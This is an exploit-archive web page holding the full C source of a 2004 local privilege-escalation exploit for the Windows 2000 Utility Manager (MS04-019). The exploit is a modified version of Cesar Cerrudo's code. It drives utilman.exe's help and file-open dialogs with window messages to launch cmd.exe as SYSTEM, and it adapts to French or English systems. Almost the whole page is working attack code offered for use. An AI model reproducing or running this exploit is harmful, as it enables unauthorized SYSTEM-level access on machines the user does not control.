首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Win2k Universal language Utility Manager Exploit
来源:vfocus.net 作者:Cesar 发布时间:2004-07-21  

Windows 2000 Universal language Utility Manager Exploit (MS04-019)


/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
******************************************************************************************
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at<yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
/* end of original disclaimer */

#include <stdio.h>
#include <windows.h>

struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[] = {
{ 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, /* French */
{ 0x09,"Utility manager","Windows Help","Open" } /* English */
};

void print_lang(int id)
{
char *lang_list[] = {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
"Danish","German","Greek","English","Spanish","Finnish",
"French","Hebrew","Hungarian","Icelandic","italian",
"Japanese","Korean","Dutch","Norwegian","Polish",
"Portuguese","Romanian","Russian","Croatian","Serbian",
"Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
"Indonesian","Ukrainian","Belarusian","Slovenian",
"Estonian","Latvian","Lithuanian","Farsi","Vietnamese",
"Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",
"Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",
"Swahili","Uzbek","Tatar","Not supported","Punjabi",
"Gujarati","Not supported","Tamil","Telugu","Kannada",
"Not supported","Not supported","Marathi","Sanskrit",
"Mongolian","Galician the best;)","Konkani","Not supported",
"Not supported","Syriac","Not supported","Not supported",
"Divehi","Invariant"};
printf("%s\r\n",lang_list[id]);
return;
}

int set_lang(void)
{
unsigned int lang_usr,lang_sys,id;

id=GetSystemDefaultLangID();
lang_sys=PRIMARYLANGID(id);
id=GetUserDefaultLangID();
lang_usr=PRIMARYLANGID(id);
if(lang_usr!=lang_sys) {
printf("warning: user language differs from system language\r\n\r\n");
printf("1. system : ");print_lang(lang_sys);
printf("2. user : ");print_lang(lang_usr);printf("Select(1-2): ");
id=getch();
if(id!=49&&id!=50) {
printf("wrong choice '%c', leaving.\r\n",id);
exit(0);
}
if(id==49) {
printf("system language\r\n");
return lang_sys;
}
else
printf("user language\r\n");
}
return lang_usr;
}

void banner()
{
system("cls");
printf("\r\n\r\n\t[Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt]\r\n");
printf("\t\t\t base code by Cesar Cerrudo\r\n");
printf("\t\t\t You know where we are...\r\n\r\n");
return;
}

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char cmd[]="%windir%\\system32\\cmd.ex?";
unsigned int i;
int lang_id;

banner();

printf("[+] Gathering system language information\r\n");
lang_id=set_lang();
printf("[+] OK language ...");print_lang(lang_id);

for(i=0;i<sizeof(lang)/sizeof(lang[0]);i++)
if(lang[i].id==lang_id)
break;
if(i==sizeof(lang)/sizeof(lang[0])) {
printf("error: undefined language.\r\n");
return -1;
}
printf("[+] Trying to execute program with SYSTEM priviliges through utilman.exe\r\n");
printf("prog: %s\r\n",cmd);
// run utility manager
// system("utilman.exe /start");
WinExec("utilman.exe /start",SW_HIDE);
Sleep(1000);

lHandle=FindWindow(NULL, lang[i].utilman);
if (!lHandle) {
printf("error: unable to start utilman.exe.\r\n");
return 0;
}

PostMessage(lHandle,0x313,0,0); //=right click on the app button in the
//taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP 0x0365 lParam must be<>NULL
Sleep(300);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);

// find open file dialog window
lHandle = FindWindow("#32770",lang[i].open);
// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);

//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_CLOSE, 0, 0);// close open error window
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MPlayer buffer overflow for UN
·Win2k Utility Manager all in o
·Win2k Utility Manager Privileg
·WinNT/2k POSIX Subsystem Privi
·Microsoft IE Remote Wscript.Sh
·Win2K/XP Task Scheduler .job E
·MySQL Authentication Bypass Ex
·Apache 1.3.* find users exploi
·Microsoft IE Remote Applicatio
·drcatd 0.5.0 beta buffer overf
·FreeBSD Local DoS Exploit
·Exploit for atari800 version 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved